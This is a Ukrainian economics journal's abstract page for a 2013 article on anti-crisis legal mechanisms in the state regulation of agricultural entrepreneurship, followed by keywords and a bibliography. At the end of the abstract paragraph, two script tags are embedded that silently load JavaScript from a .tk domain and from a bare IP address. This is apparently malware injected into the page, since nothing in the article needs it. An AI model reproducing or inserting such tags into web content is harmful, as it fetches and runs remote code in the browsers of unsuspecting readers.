ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 342;330.131.7;338.439
Сторінка молодого науковця

Антикризова спрямованість правових механізмів державного регулювання аграрного підприємництва / Фугело П. М. // Економіка АПК. - 2013. - № 2 - С. 119

Аграрна політика держави передбачає удосконалення діючої системи державного регулювання галузевого підприємництва. Нею ж передбачено створення передумов мінімізації аграрних ризиків. Реалізація цих положень вимагає й антиризикового спрямування відповідних правових механізмів, що забезпечують прискорений інвестиційно-інноваційний розвиток галузі. Рис.: 2. Бібліогр.: 16.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ризик, право, державне регулювання, підприємництво, аграрний сектор економіки

Список використаних джерел

 1. Саблук П.Т. Розвиток земельних відносин в Україні / П.Т. Саблук. - К.: ННЦ ІАЕ, 2006. - 396 с.
 2. Кропивко М. Ф. Кластерний підхід до управління сільським розвитком / М.Ф. Кропивко // Економіка АПК.- 2008. - № 5. - С.55-58.
 3. Шпикуляк О.Г. Інституції аграрного ринку: моногр. / О.Г. Шпикуляк. - К.: ННЦ ІАЕ, 2009. - 480 с.
 4. Діброва А.Д. Державне регулювання сільськогосподарського виробництва : автореф. дис. на здобуття наук. ступеня д-ра екон. наук: спец. 08.00.03 „Економіка та управління національнім господарством” / А. Д. Діброва. - К., 2008. - 40 с.
 5. Чепурко В.В. Економічний ризик аграрного виробництва: автореф. дис... на здобуття наук. ступ. д-ра екон. наук: 08.07.02 / В.В. Че- пурко; НАН України, Інститут економіки. - К., 2001. - 33 с.
 6. Минка А.П. Управління підприємницьким ризиком в агробізнесі: автореф. дис... канд. екон. наук: 08.06.02 / А.П. Минка; Інститут аграрної економіки УААН. - К., 2001. - 22 с.
 7. Смит А. Исследование о природе и причинах богатства народов. / А.Смит; пер. с англ. - М.: ЭКСМО, 2007. - 960 с.
 8. Маркс К. Экономическая рукопись 1861-1863 годов (процесс производства капитала). Часть вторая // К.Маркс и Ф.Энгельс. Изд.2-е, т. 47. - М.: Госполитиздат, 1973. - 659 с.
 9. Маркс К. Капитал. Том 1. / К.Маркс и Ф.Энгельс. Соч., изд-2-e, т. 23. - М.: Госполитиздат, 1960. - 790 с.
 10. Маршалл А. Принципы экономической науки, т.3; пер с англ. / А. Маршал. - М:, Издат. группа “Прогресс”, 1993. - 351 с.
 11. Кейнс ДжМ. Общая теория занятости, процента и денег: пер. с англ. / Дж. М. Кейнс. - М.: Гелиос АРВ, 1999. - 352 с.
 12. МизесЛ. Индивид, рынок и правовое государство; пер. с англ. / Л. Мизес. - СПб.: Пневма, 1999. - 196 с.
 13. Найт Ф.Х. Риск, неопределенность и прибыль; пер. с англ. / Ф.Х. Найт. - М.: Дело, 2003. - 360 с.
 14. ШумпетерЙ. А. Теория экономического развития; пер. с англ. / И.А. Шумпетер. - М.: Прогресс, 1982. - 354 с.
 15. Маркс К. Капитал. Критика политической экономии. т. 2, книга II / К. Маркс и Ф. Энгельс. Изд. 2-е, т .24. - М.: Госполитиздат, 1961. - С. 3-648.
 16. Гэлбрейт Дж. Новое индустриальное общество: пер. с англ. / Дж. Гэлбрейт. - М.: ООО «Изд-во АСТ», 2004. - 602 с.
Читати статтю: 13_02_22.pdf